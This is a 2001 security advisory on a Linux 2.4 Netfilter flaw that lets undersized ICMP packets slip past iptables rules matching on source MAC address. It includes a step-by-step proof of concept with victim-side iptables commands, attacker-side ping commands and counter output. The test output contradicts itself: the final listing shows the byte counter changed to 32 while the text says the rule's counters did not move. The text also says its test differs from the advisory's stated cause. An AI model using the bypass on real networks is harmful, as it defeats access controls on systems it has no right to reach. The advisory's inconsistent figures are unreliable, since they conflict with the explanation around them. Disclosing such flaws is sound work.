Linux 2.4 kernel: Netfilter MAC match filtering can be bypassed

Published: 2001-10-13
Updated: 2001-10-13
Severity: Medium
Threat level: Other
Error type: Design error
Exploitation: Server mode

Affected systems
Linux kernel 2.4

Detailed description

The Netfilter MAC match module in Linux 2.4 (the `-m mac --mac-source` match in iptables) can be bypassed, letting a host that is supposed to be blocked by its MAC address reach the filtering system. The advisory attributes the bypass to fragmented packets; the test below shows the same effect with an unfragmented but undersized ICMP echo request. A rule that drops all ICMP from a given source MAC matches a 36-byte echo request (8 bytes of ping payload) but not a 32-byte one (4 bytes of payload): the smaller packet is answered normally and the rule's packet and byte counters do not move. Since MAC matching only applies to traffic on the local link, the attacker must be on the same Ethernet segment as the victim.

Test code

On Victim:

victim# iptables -P INPUT ACCEPT
victim# iptables -F INPUT
victim# iptables -I INPUT -p icmp -m mac --mac-source AT:TA:CK:ER:00:00 -j DROP
victim# iptables -L INPUT -v
Chain INPUT (policy ACCEPT xxxx packets, xxxxxxx bytes)
 pkts bytes target     prot opt in     out     source               destination
    0     0 DROP       icmp --  any    any     anywhere             anywhere           MAC AT:TA:CK:ER:00:00

[note that the packet and byte counters are zero]

On Attacker (assuming Attacker runs Linux or similar):

attacker# ping -s 8 -c 1 Victim
PING Victim (xx.xx.xx.xx) from xx.xx.xx.xx : 8(36) bytes of data.

--- xx.xx.xx.xx ping statistics ---
1 packets transmitted, 0 packets received, 100% packet loss

[the ping packets were dropped, correctly]

On Victim again:

victim# iptables -L INPUT -v
Chain INPUT (policy ACCEPT 231 packets, 39475 bytes)
 pkts bytes target     prot opt in     out     source               destination
    1    36 DROP       icmp --  any    any     anywhere             anywhere           MAC 00:03:47:87:BA:C5

[note that the packet and byte counters have increased; the packet counter shows 1 packet, which is correct. This listing shows the rule's MAC address as it really was on the test host; the advisory's other listings replace it with the placeholder AT:TA:CK:ER:00:00]

Now back to Attacker:

attacker# ping -s 4 -c 1 Victim
PING Victim (xx.xx.xx.xx) from xx.xx.xx.xx : 4(32) bytes of data.
12 bytes from xx.xx.xx.xx: icmp_seq=0 ttl=255

--- xx.xx.xx.xx ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss

[note that this time the ping packet was replied to, not dropped by the rule]

And finally, back to Victim:

victim# iptables -L INPUT -v
Chain INPUT (policy ACCEPT 231 packets, 39475 bytes)
 pkts bytes target     prot opt in     out     source               destination
    1    32 DROP       icmp --  any    any     anywhere             anywhere           MAC AT:TA:CK:ER:00:00

[note that the packet counter has not increased; the packet did not match the drop rule]

This has two consequences:

- A malicious user can bypass iptables drop rules that are based on MAC address.
- If pnAnywhere is set up by MAC address, it may not work correctly.

Until a fix is available, a MAC match should not be the only control on a rule: combine it with source-IP filtering, and verify with the rule counters (iptables -L INPUT -v -n -x gives numeric, exact counts) that a rule is actually matching the traffic it is meant to drop.

Solution
None yet.

Related information